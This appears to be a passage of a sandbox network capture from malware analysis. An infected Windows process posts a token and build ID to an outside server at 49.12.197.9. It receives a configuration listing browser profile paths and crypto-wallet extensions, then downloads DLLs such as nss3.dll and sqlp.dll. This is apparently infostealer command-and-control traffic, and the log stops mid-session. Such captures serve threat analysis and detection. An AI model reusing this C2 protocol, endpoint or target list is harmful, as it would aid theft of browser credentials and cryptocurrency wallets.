2024-10-03 01:26:46 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 3a1|1|1|1|7919bb817d16eff5ed5041f1923e3db3|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49714 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:47 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:26:47 UTC | 331 | OUT
                                                                                                                                                                            Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------IJKFHDBKFCAAECBFIDHJCont
2024-10-03 01:26:48 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:48 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:26:48 UTC | 1564 | IN
                                                                                                                                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49715 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:49 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:26:49 UTC | 331 | OUT
                                                                                                                                                                            Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------FHCAEGCBFHJDGCBFHDAFCont
2024-10-03 01:26:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:49 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:49 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                            Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49716 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:50 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 332
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------JDBFIIEBGCAKKEBFBAAFCont
2024-10-03 01:26:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:51 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49717 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:51 UTC | 277 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 6897
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:51 UTC6897OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------AKEGDAKEHJDHIDHJJDAECont
2024-10-03 01:26:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:52 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
2024-10-03 01:26:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49718 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:53 UTC | 192 | OUT | GET /sqlp.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-03 01:26:53 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:53 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 2459136
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:26:53 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:26:53 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49719 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:56 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 829
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------KKKEBKJJDGHCBGCAAKEHCont
2024-10-03 01:26:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:26:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49720 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:57 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                            Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------HCGCBFHCFCFBFIEBGHJECont
2024-10-03 01:26:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:26:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49721 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:59 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                            Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------GDBKKFHIEGDHJKECAAKKCont
2024-10-03 01:27:00 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:27:00 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49722 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:01 UTC | 195 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:01 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:01 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:01 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49723 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:03 UTC | 195 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:03 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:03 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:03 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49724 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:06 UTC | 196 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:06 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:06 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:06 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49725 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:08 UTC | 196 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:08 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:08 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:08 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            15 | 192.168.2.9 | 49726 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-03 01:27:09 UTC | 200 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:10 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:10 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:10 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                            16 | 192.168.2.9 | 49727 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-03 01:27:11 UTC | 192 | OUT | GET /nss3.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:11 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:11 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:11 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                            2024-10-03 01:27:11 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                                                                            Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                                                                            2024-10-03 01:27:12 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                                                                            Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                            2024-10-03 01:27:12 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                                                                            Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49729 | 49.12.197.9 | 443 | 1420 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:14 UTC | 277 | OUT | POST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDB
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
